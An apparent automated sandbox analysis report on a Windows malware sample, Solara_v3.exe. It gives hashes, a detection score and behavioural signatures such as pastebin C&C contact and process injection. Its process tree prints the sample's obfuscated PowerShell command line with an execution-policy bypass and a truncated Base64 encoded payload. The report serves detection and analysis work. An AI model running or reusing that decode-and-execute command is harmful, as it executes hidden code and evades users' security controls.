Edit tour
Windows
Analysis Report
Solara_v3.exe
Overview
General Information
| Sample name: | Solara_v3.exe |
| Analysis ID: | 1585428 |
| MD5: | 404f9a9a90f2729d0acba7e76527fb88 |
| SHA1: | 441a37963638e3f4635ef8c5fa35fd8fa566e325 |
| SHA256: | 96559ba94a96b7a3ab66125a3556c6a8ec07fe561f8d60bd06f66520e3366c5e |
| Tags: | exeuser-aachum |
| Infos: |   |
 | |
Detection
| Score: | 76 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
Solara_v3.exe (PID: 4836 cmdline: "C:\Users\ user\Deskt op\Solara_ v3.exe" MD5: 404F9A9A90F2729D0ACBA7E76527FB88) 
conhost.exe (PID: 5832 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 652 cmdline: "powershel l" -NoLogo -NonInter active -No Profile -E xecutionPo licy Bypas s -Encoded Command Ww BTAHkAcwB0 AGUAbQAuAF QAZQB4AHQA LgBFAG4AYw BvAGQAaQBu AGcAXQA6AD oAVQBUAEYA OAAuAEcAZQ B0AFMAdABy AGkAbgBnAC gAWwBTAHkA cwB0AGUAbQ AuAEMAbwBu AHYAZQByAH QAXQA6ADoA RgByAG8AbQ BCAGEAcwBl ADYANABTAH QAcgBpAG4A ZwAoACgAJw B7ACIAUwBj AHIAaQBwAH QAIgA6ACIA YQBXAFkAZw BLAEMAMQB1 AGIAMwBRAG cASwBGAHQA VABlAFgATg AwAFoAVwAw AHUAVABXAE YAdQBZAFcA ZABsAGIAVw BWAHUAZABD ADUAQgBkAF gAUgB2AGIA VwBGADAAYQ BXADkAdQBM AGwAQgBUAF YASABsAHcA WgBVADUAaA BiAFcAVgBk AEoAMQBkAH AAYgBqAE0A eQBKAHkAaw B1AFYASABs AHcAWgBTAG sAZwBlAHcA MABLAEkAQw BBAGcASQBF AEYAawBaAE MAMQBVAGUA WABCAGwASQ BFAEEAaQBE AFEAbwBnAE kAQwBBAGcA ZABYAE4AcA BiAG0AYwBn AFUAMwBsAH oAZABHAFYA dABPAHcAMA BLAEkAQwBB AGcASQBIAF YAegBhAFcA NQBuAEkARg BOADUAYwAz AFIAbABiAF MANQBTAGQA VwA1ADAAYQ BXADEAbABM AGsAbAB1AG QARwBWAHkA YgAzAEIAVA BaAFgASgAy AGEAVwBOAG wAYwB6AHMA TgBDAGcAMA BLAEkAQwBB AGcASQBIAE IAMQBZAG0A eABwAFkAeQ BCAGoAYgBH AEYAegBjAH kAQgBYAGEA VwA0AHoATQ BpAEIANwBE AFEAbwBnAE kAQwBBAGcA SQBDAEEAZw BJAEYAdABF AGIARwB4AE oAYgBYAEIA dgBjAG4AUQ BvAEkAbgBW AHoAWgBYAE kAegBNAGkA NQBrAGIARw B3AGkASwBW ADAATgBDAG kAQQBnAEkA QwBBAGcASQ BDAEEAZwBj AEgAVgBpAG IARwBsAGoA SQBIAE4AMA BZAFgAUgBw AFkAeQBCAG wAZQBIAFIA bABjAG0ANA BnAFMAVwA1 ADAAVQBIAF IAeQBJAEUA ZABsAGQARQ BaAHYAYwBt AFYAbgBjAG 0AOQAxAGIA bQBSAFgAYQ BXADUAawBi ADMAYwBvAE sAVABzAE4A QwBnADAASw BJAEMAQQBn AEkAQwBBAG cASQBDAEIA YgBSAEcAeA BzAFMAVwAx AHcAYgAzAE oAMABLAEMA SgAxAGMAMg BWAHkATQB6 AEkAdQBaAE cAeABzAEkA aQBsAGQARA BRAG8AZwBJ AEMAQQBnAE kAQwBBAGcA SQBGAHQAeQ BaAFgAUgAx AGMAbQA0AD YASQBFADEA aABjAG4ATg BvAFkAVwB4 AEIAYwB5AG gAVgBiAG0A MQBoAGIAbQ BGAG4AWgBX AFIAVQBlAF gAQgBsAEwA awBKAHYAYg AyAHcAcABY AFEAMABLAE kAQwBBAGcA SQBDAEEAZw BJAEMAQgB3 AGQAVwBKAH MAYQBXAE0A ZwBjADMAUg BoAGQARwBs AGoASQBHAF YANABkAEcA VgB5AGIAaQ BCAGkAYgAy ADkAcwBJAE YATgBvAGIA MwBkAFgAYQ BXADUAawBi ADMAYwBvAF MAVwA1ADAA VQBIAFIAeQ BJAEcAaABY AGIAbQBRAH MASQBHAGwA dQBkAEMAQg B1AFEAMgAx AGsAVQAyAG gAdgBkAHkA awA3AEQAUQ BvAGcASQBD AEEAZwBmAF EAMABLAEkA awBBAE4AQw BuADAATgBD AG0AWgAxAG IAbQBOADAA YQBXADkAdQ BJAEUAZABs AGQARQBGAG oAZABHAGwA MgBaAFYAZA BwAGIAbQBS AHYAZAAxAF IAcABkAEcA eABsAEsAQw BrAGcAZQB3 ADAASwBJAE MAQQBnAEkA QwBSAG8AVg AyADUAawBJ AEQAMABnAF cAMQBkAHAA YgBqAE0AeQ BYAFQAbwA2 AFIAMgBWAD AAUgBtADkA eQBaAFcAZA B5AGIAMwBW AHUAWgBGAG QAcABiAG0A UgB2AGQAeQ BnAHAARABR AG8AZwBJAE MAQQBnAEoA SABOAGkASQ BEADAAZwBU AG0AVgAzAE wAVQA5AGkA YQBtAFYAag BkAEMAQgBU AGUAWABOAD AAWgBXADAA dQBWAEcAVg A0AGQAQwA1 AFQAZABIAE oAcABiAG0A ZABDAGQAVw BsAHMAWgBH AFYAeQBLAE QASQAxAE4A aQBrAE4AQw BpAEEAZwBJ AEMAQgBiAF YAMgBsAHUA TQB6AEoAZA BPAGoAcABI AFoAWABSAF gAYQBXADUA awBiADMAZA BVAFoAWABo